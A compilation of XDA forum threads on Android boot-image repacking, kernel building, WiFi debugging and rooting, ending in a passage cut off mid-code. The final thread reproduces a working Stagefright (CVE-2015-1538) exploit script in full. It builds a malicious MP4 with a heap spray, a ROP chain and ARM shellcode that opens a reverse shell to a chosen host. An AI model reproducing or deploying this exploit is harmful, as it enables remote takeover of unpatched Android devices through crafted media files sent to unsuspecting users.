Fastboot boot image : dtb not found - Android Q&A, Help & Troubleshooting

HI there
I am having a problem to re-pack my boot image to boot in my new Pantech A880S....
It is working fine if I just fastboot boot <original image>
but once I extract the ZImage and Ramdisk and then re-pack it (eventhough I didn't change anything)
and when I re-try fastboot boot <re-packed image> it comes up with error: dtb not found
I tried this same issue either on linux abootimg to re-pack image or using Win32 port exe to re-pack it
e.g. http://forum.xda-developers.com/showpost.php?p=45157543&postcount=144
Is there anyone know why? I never seen this before on other devices with such error..
anyone know about kernel and dtb , how to extract them and pack them correctly?
Splitting image to "/split_img/" . . .
BOARD_KERNEL_CMDLINE console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 maxcpus=2 msm_rtb.filter=0x3F ehci-hcd.park=3 loglevel=0
BOARD_KERNEL_BASE 00000000
BOARD_PAGE_SIZE 2048
BOARD_RAMDISK_ADDR 02000000
Unpacking ramdisk to "/ramdisk/" . . .
Compression used: gzip
4704 blocks
Done!
Everything looks ok, but when I using fastboot to boot it (my device has been unloacked bootloader)
>fastboot boot image-new.img
downloading 'boot.img'...
OKAY [ 0.301s]
booting...
FAILED (remote: dtb not found)
finished. total time: 0.316s
Edit:
I tried to looking other similar kernel source from LG G2 (MSM8974)
/arch/arm/mach-msm/akefile.boot
I seems LG also using DTB in its kernel... so I am wondering current abootimg can handle it or not?
# MSM8974
zreladdr-$(CONFIG_ARCH_MSM8974) := 0x00008000
ifeq ($(CONFIG_MACH_LGE),n)
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-cdp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-fluid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-mtp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-rumi.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v1-sim.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-cdp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-fluid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += msm8974-v2-mtp.dtb
dtb-$(CONFIG_ARCH_MSM8974) += apq8074-v2-liquid.dtb
dtb-$(CONFIG_ARCH_MSM8974) += apq8074-v2-dragonboard.dtb
else
dtb-$(CONFIG_ARCH_MSM8974_G2_KR) += msm8974-g2-kr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KR) += msm8974-v2-g2-kr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_ATT) += msm8974-g2-att.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_ATT) += msm8974-v2-g2-att.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_VZW) += msm8974-g2-vzw.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_VZW) += msm8974-v2-g2-vzw.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_SPR) += msm8974-g2-spr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_SPR) += msm8974-v2-g2-spr.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_TMO_US)+= msm8974-g2-tmo_us.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_TMO_US)+= msm8974-v2-g2-tmo_us.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_DCM) += msm8974-g2-dcm.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_DCM) += msm8974-v2-g2-dcm.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KDDI) += msm8974-g2-kddi.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_KDDI) += msm8974-v2-g2-kddi.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_COM) += msm8974-g2-open_com.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_COM) += msm8974-v2-g2-open_com.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_AME) += msm8974-g2-open_ame.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPEN_AME) += msm8974-v2-g2-open_ame.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPT_AU) += msm8974-g2-opt_au.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_OPT_AU) += msm8974-v2-g2-opt_au.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_CA) += msm8974-g2-ca.dtb
dtb-$(CONFIG_ARCH_MSM8974_G2_CA) += msm8974-v2-g2-ca.dtb
endif

I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment split_bootimg_dtb.zip

thank benjaminwan

https://github.com/xiaolu/mkbootimg_tools

benjaminwan said:
I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment 2229037
Click to expand...
Click to collapse
I'm testing, hoping to succeed @benjaminwan :fingers-crossed:

benjaminwan said:
I modified the split tool to support dtb, please test it……
Modify permissions before you use it
chmod a+x split_bootimg_dtb.pl
View attachment 2229037
Click to expand...
Click to collapse
Great work! I'm going to see if I can adapt this back into unpackbootimg. :good:
https://github.com/CyanogenMod/android_system_core/tree/cm-10.2/mkbootimg
Edit: Easier than I thought just using what was already in unpackbootimg.c and bootimg.h
Soon to be added to my Android Image Kitchen: http://v.ht/AIK-

reachedxyz said:
thanks you pro
Click to expand...
Click to collapse
help me. phone my brick

Chenglu said:
https://github.com/xiaolu/mkbootimg_tools
Click to expand...
Click to collapse
Thanks, thats work for me :angel:

Hello Guys,
I'm trying to boot the HTD Desire 510 recovery CWM on my new Wiko Ridge 4G.
I also got the DTB issue, but I'm not sure on how to fix it.
Can anyone throw me some tips on this?
I've chosen the Desire CWM because it have the same chipset.
Cheers

help me
please give me some tutorial to modif the split tool.

Hi Benjamin,
I am using Lenovo a6000 plus and getting the same error while I try to fastboot using command <fastboot boot "c:\Users\rakesh\lenovo-recovery-file\recovery.img">
What should I do?
I am not even able to enter recovery mode. My mobile got switched off during android upgradation. I think I lost some system file.

My phone lenovo a6000 plus error remote dtb not found how to fix the problem

Booting problem
Please tell Step by Step. Need help does not boot into any recovery.

hi iam also having same problem for my lenovo a6000 when itry to boot into recovery iam getting this error failed {remote:dtb not found} please help m any one.

How to apply da zip file to fix dtb not found during flashboot boot recovery.img command@benjaminwan

Related

Building kernel SM-T525

Instruction to build a kernel from Samsung Sources:
1. Download and unpack source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
2. Download and upack android ndk from https://developer.android.com/tools/sdk/ndk/index.html
3. Set enviroment varibles (use gcc 4.6, not 4.8):
export CROSS_COMPILE="~/android/android-ndk-r9d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"
Click to expand...
Click to collapse
4. If you want to add loadable modules support, apply patch modules_support.patch from attach
patch -p1 < modules_support.patch
Click to expand...
Click to collapse
5. Create kernel config
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
Click to expand...
Click to collapse
6. Buld kernel
make -j3
Click to expand...
Click to collapse
7. Buld device tree image
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/
Click to expand...
Click to collapse
8. Buld boot.img (default ramdisk image in attach)
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img
Click to expand...
Click to collapse
9. Create .tar.md5 to flash with Odin
tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
Click to expand...
Click to collapse
10. To fix Wi-Fi edit build.prop on your device, change ro.securestorage.support fron true to false
ro.securestorage.support=false
Click to expand...
Click to collapse
GitHub: https://github.com/vanyasvl/android_kernel_samsung_picassoeur
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Hello. I'm trying to build stock Samsung kernel for Tab Pro 10.1 Sm-T525 and I have a problem:<br />
Wi-fi isn't working on builded kernel. All kernel configs are default from Samsung, bluetooth and Lte works ok.<br />
<br />
I need help with debug wifi problem.<br />
"ip a" command shows wlan0 network device, but wifi can't be enabled from configuration<br />
<br />
My steps to build kernel:<br />
Download source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525<br />
unpack it to ~/android/kernel<br />
<br />
cd ~/android/kernel<br />
export CROSS_COMPILE="/home/vanyas/android/android-ndk-r9d_x64/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"<br />
export ARCH="arm"<br />
<br />
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig<br />
make -j3<br />
<br />
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/<br />
<br />
unpack original boot.img with split_boot to boot folder<br />
<br />
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk boot/boot.img-ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img<br />
<br />
tar -H ustar -c boot.img > boot.tar<br />
md5sum -t boot.tar >> boot.tar<br />
mv boot.tar boot.tar.md5
Click to expand...
Click to collapse
Click to expand...
Click to collapse
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
crpalmer said:
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
Click to expand...
Click to collapse
Thanks, but it is not a module load problem. SM-T525 kernel builds without modules support and wifi driver (bcm4339) compilled into the kernel.
vanyas said:
Thanks, but it is not a module load problem. SM-T525 kernel builds without modules support and wifi driver (bcm4339) compilled into the kernel.
Click to expand...
Click to collapse
That's interesting. The sm-t320 is a prima chipset which is built as a module.
Do you see anything in the logcat or the dmesg related to the wlan, bcm4339, wifi, etc?
There are patches for SM-T525 kernel source that resolve problem with "modules support" compilation
--- kernel_orig/arch/arm/mm/proc-syms.c 2014-04-09 12:10:04.846114000 +1100
+++ kernel/arch/arm/mm/proc-syms.c 2014-04-09 11:54:33.894114000 +1100
@@ -18,7 +18,6 @@
#ifndef MULTI_CPU
EXPORT_SYMBOL(cpu_dcache_clean_area);
EXPORT_SYMBOL(cpu_set_pte_ext);
-EXPORT_SYMBOL(cpu_tima_set_pte_ext);
#else
EXPORT_SYMBOL(processor);
#endif
--- kernel_orig/arch/arm/mach-msm/sec-switch.c 2014-01-23 15:34:20.000000000 +1100
+++ kernel/arch/arm/mach-msm/sec-switch.c 2014-04-09 11:29:26.322114000 +1100
@@ -2565,7 +2565,7 @@
pr_info("%s: Ignore Cable setting, Not LPM mode\n", __func__);
}
}
-EXPORT_SYMBOL(fsa9485_set_mhl_cable)
+EXPORT_SYMBOL(fsa9485_set_mhl_cable);
boon fsa9485_muic_is_mhl_attached(void)
{
--- kernel_orig/Makefile 2014-01-23 15:34:19.000000000 +1100
+++ kernel/Makefile 2014-04-09 20:55:48.278114000 +1100
@@ -351,7 +351,7 @@
CHECKFLAGS := -D__linux__ -Dlinux -D__STDC__ -Dunix -D__unix__ \
-Wbitwise -Wno-return-void $(CF)
-CFLAGS_MODULE =
+CFLAGS_MODULE = -fno-pic
AFLAGS_MODULE =
LDFLAGS_MODULE =
CFLAGS_KERNEL =
Click to expand...
Click to collapse
Yes! I did it!
To fix wifi: ro.securestorage.support=false in build.prop
thornev said:
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Click to expand...
Click to collapse
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
scrosler said:
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
Click to expand...
Click to collapse
can you make a thread showing us some the difficulties you encountered working around Knox?
Silkmeister
@Silkmeister1, @Scott, @vanyas, @crpalmer:
I do have a WiFi/BT issue with my (second hand) device. Wifi/BT is not to be enabled in Android. My first suspect was a broken connection, but couldn't found something obvious.
I tried to update Stock Rom and found and issue with ODIN. Stock Rom was not installable, returns with size error in hidden image. (??? what is in there ???). Installed latest LOS and checked the boot messages.
Do you think this can be a software issue? Is there anything missing (stuff in hidden partition) ?
Code:
failed to power up wifi chip, retry again (4 left) **
[ 4.035535] ## wifi_remove
[ 4.035538] wifi_set_power = 0
[ 4.035541] ------------------------------------------------
[ 4.035542] ------------------------------------------------
[ 4.035544] brcm_wlan_power Enter: power off
[ 4.035548] WL_REG_ON off-step : [1]
[ 4.035554] WL_REG_ON off-step-2 : [0]
[ 4.139482] wifi_set_carddetect = 0
[ 4.139485] brcm_wifi_status:359 status 0
[ 4.139487] mmc0: Slot status change detected (1 -> 0)
[ 4.139870] wifi_set_power = 1
[ 4.139873] ------------------------------------------------
[ 4.139874] ------------------------------------------------
[ 4.139876] brcm_wlan_power Enter: power on
[ 4.139880] WL_REG_ON on-step : [0]
[ 4.139887] WL_REG_ON on-step-2 : [1]
[ 4.349477] wifi_set_carddetect = 1
[ 4.349480] brcm_wifi_status:359 status 1
…
Complete bootlog can be seen here in the attachment:
https://forum.xda-developers.com/showpost.php?p=72624259&postcount=213
Any help is welcome!

Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?

Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android System. And that seems to be quiet easy - just executing a python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
Click to expand...
Click to collapse
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
Click to expand...
Click to collapse
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony have strengthen the security using a kernel module (Sony RIC) that disallows any user (even root) to remount system partition.
However, you could maybe (very unlikely) find a system writable executable file in ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
Click to expand...
Click to collapse
Afaik, no one have succeeded yet.
klausstoertebeker said:
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Click to expand...
Click to collapse
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet propulsed military planes ), but it seems to me that the way described in the linked document is easier to go than the way to use the CVE-2015-1538 - I read in the internet that Sony currently is delivering a patch closing the stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a walkable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA Partition could be included into that app using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
Click to expand...
Click to collapse
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-1538-2015 mp4-file
Hi nilezon,
I was able to generate the CVE-1538-2015 file doing three modifications to the python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
